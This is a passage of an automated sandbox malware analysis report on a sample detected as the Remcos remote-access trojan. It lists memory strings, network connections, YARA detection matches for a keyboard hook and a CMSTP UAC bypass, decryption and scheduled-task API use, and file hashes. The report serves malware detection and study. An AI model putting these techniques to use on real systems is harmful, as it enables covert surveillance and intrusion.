                      Source: csc.exe, 00000003.00000002.4047594349.0000000009530000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.00000000082D5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: csc.exe, 00000003.00000002.4047594349.0000000009530000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.00000000082D5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                      Source: csc.exe, 00000003.00000002.4047594349.0000000009530000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.00000000082D5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: csc.exe, 00000003.00000002.4047594349.0000000009530000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.00000000082D5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4046058134.0000000006D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: csc.exe, 00000003.00000002.4047594349.0000000009530000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.00000000082D5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                      Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.5:49750 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.5.24.44:443 -> 192.168.2.5:49760 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Installs a global keyboard hook
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\ccrdlld.exeJump to behavior
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.11bb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.13420000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.11bb0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.13420000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: ccrdlld.exe PID: 4288, type: MEMORYSTR

                      E-Banking Fraud

                      barindex
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.11bb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.13420000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.11bb0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.13420000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.4045506255.0000000009A48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: ccrdlld.exe PID: 4288, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ccrdlld.exe PID: 7120, type: MEMORYSTR

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 5.2.ccrdlld.exe.11bb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 5.2.ccrdlld.exe.11bb0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 5.2.ccrdlld.exe.11bb0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 5.2.ccrdlld.exe.13420000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 5.2.ccrdlld.exe.13420000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 5.2.ccrdlld.exe.13420000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 5.2.ccrdlld.exe.11bb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 5.2.ccrdlld.exe.11bb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 5.2.ccrdlld.exe.11bb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 5.2.ccrdlld.exe.13420000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 5.2.ccrdlld.exe.13420000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 5.2.ccrdlld.exe.13420000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: Process Memory Space: ccrdlld.exe PID: 4288, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      .NET source code contains very large array initializations
                      Source: 0.2.4JwhvqLe8n.exe.22c0000.1.raw.unpack, MapAnalyzer.csLarge array initialization: LinkSetMap: array initializer size 543568
                      Drops large PE files
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeFile dump: OrionLegacyCLI.exe.0.dr 979567344Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeFile dump: HardDiskSentinelBin.exe.5.dr 979567142Jump to dropped file
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040A8CC0_2_0040A8CC
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040B0770_2_0040B077
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0041E8140_2_0041E814
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040B0350_2_0040B035
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040B0D90_2_0040B0D9
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040B08B0_2_0040B08B
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040B0950_2_0040B095
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_004219430_2_00421943
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040A9540_2_0040A954
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040A96E0_2_0040A96E
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040A9D80_2_0040A9D8
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040A9840_2_0040A984
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040B9A70_2_0040B9A7
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040A9AE0_2_0040A9AE
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_004152100_2_00415210
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040AAC90_2_0040AAC9
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040AAFE0_2_0040AAFE
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040AAAD0_2_0040AAAD
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040AAB20_2_0040AAB2
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040B3420_2_0040B342
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040BB4A0_2_0040BB4A
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040B3350_2_0040B335
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040BBF10_2_0040BBF1
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040B3A90_2_0040B3A9
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040B4590_2_0040B459
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040B4010_2_0040B401
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040B4100_2_0040B410
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040B41F0_2_0040B41F
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040B4890_2_0040B489
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040B4940_2_0040B494
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040BD590_2_0040BD59
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040BD600_2_0040BD60
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0041ED650_2_0041ED65
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040BD660_2_0040BD66
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040B5040_2_0040B504
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040B5240_2_0040B524
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040B5D40_2_0040B5D4
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_00407E570_2_00407E57
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0041FDAB0_2_0041FDAB
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040B5B80_2_0040B5B8
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040ADBC0_2_0040ADBC
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_00421E530_2_00421E53
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040B6090_2_0040B609
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040AE150_2_0040AE15
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040B6160_2_0040B616
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040AE1C0_2_0040AE1C
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040C6350_2_0040C635
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040AE380_2_0040AE38
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040AF5C0_2_0040AF5C
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040AF640_2_0040AF64
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040BF780_2_0040BF78
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040B7090_2_0040B709
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040BFD10_2_0040BFD1
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_0040BFB00_2_0040BFB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_050547413_2_05054741
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_050547613_2_05054761
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_050571483_2_05057148
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_050571583_2_05057158
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_050548683_2_05054868
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05051BB03_2_05051BB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05051BC03_2_05051BC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0936073F3_2_0936073F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09360A773_2_09360A77
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_093617E83_2_093617E8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0937258B3_2_0937258B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_093781263_2_09378126
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_093781283_2_09378128
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_093781013_2_09378101
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0937307F3_2_0937307F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_093730AF3_2_093730AF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_093785213_2_09378521
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_093F59383_2_093F5938
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_093F4D203_2_093F4D20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_093F0DD83_2_093F0DD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_093F27583_2_093F2758
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_093F76203_2_093F7620
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_093F50683_2_093F5068
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_093FA4B03_2_093FA4B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_093F27483_2_093F2748
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_093F76133_2_093F7613
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\ccrdlld.exe CA84EC6D70351B003D3CACB9F81BE030CC9DE7AC267CCE718173D4F42CBA2966
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: String function: 00406CC0 appears 34 times
                      Source: 4JwhvqLe8n.exeBinary or memory string: OriginalFilename vs 4JwhvqLe8n.exe
                      Source: 4JwhvqLe8n.exe, 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameOriginLegacyCLI.exe@ vs 4JwhvqLe8n.exe
                      Source: 4JwhvqLe8n.exe, 00000000.00000002.2404009256.0000000002476000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameYtzlkwamt.exe" vs 4JwhvqLe8n.exe
                      Source: 4JwhvqLe8n.exe, 00000000.00000002.2404795981.00000000026A6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOriginLegacyCLI.exe@ vs 4JwhvqLe8n.exe
                      Source: 4JwhvqLe8n.exeBinary or memory string: OriginalFilenameOriginLegacyCLI.exe@ vs 4JwhvqLe8n.exe
                      Source: 4JwhvqLe8n.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 5.2.ccrdlld.exe.11bb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 5.2.ccrdlld.exe.11bb0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 5.2.ccrdlld.exe.11bb0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 5.2.ccrdlld.exe.13420000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 5.2.ccrdlld.exe.13420000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 5.2.ccrdlld.exe.13420000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 5.2.ccrdlld.exe.11bb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 5.2.ccrdlld.exe.11bb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 5.2.ccrdlld.exe.11bb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 5.2.ccrdlld.exe.13420000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 5.2.ccrdlld.exe.13420000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 5.2.ccrdlld.exe.13420000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: Process Memory Space: ccrdlld.exe PID: 4288, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.2.4JwhvqLe8n.exe.22c0000.1.raw.unpack, MapAnalyzer.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.4JwhvqLe8n.exe.22c0000.1.raw.unpack, ResponderElement.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.4JwhvqLe8n.exe.22c0000.1.raw.unpack, ResponderElement.csCryptographic APIs: 'CreateDecryptor'
                      Source: 3.3.csc.exe.819ed28.5.raw.unpack, H9dYhdNnGJ0iMLyBevQ.csCryptographic APIs: 'CreateDecryptor'
                      Source: 3.3.csc.exe.819ed28.5.raw.unpack, H9dYhdNnGJ0iMLyBevQ.csCryptographic APIs: 'CreateDecryptor'
                      Source: 3.3.csc.exe.819ed28.5.raw.unpack, H9dYhdNnGJ0iMLyBevQ.csCryptographic APIs: 'CreateDecryptor'
                      Source: 3.3.csc.exe.819ed28.5.raw.unpack, H9dYhdNnGJ0iMLyBevQ.csCryptographic APIs: 'CreateDecryptor'
                      Source: 3.2.csc.exe.9c40000.8.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 3.2.csc.exe.9c40000.8.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 3.2.csc.exe.9c40000.8.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                      Source: 3.2.csc.exe.9c40000.8.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                      Source: 3.2.csc.exe.9c40000.8.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 3.2.csc.exe.9c40000.8.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: 3.2.csc.exe.9c40000.8.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 3.2.csc.exe.9c40000.8.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
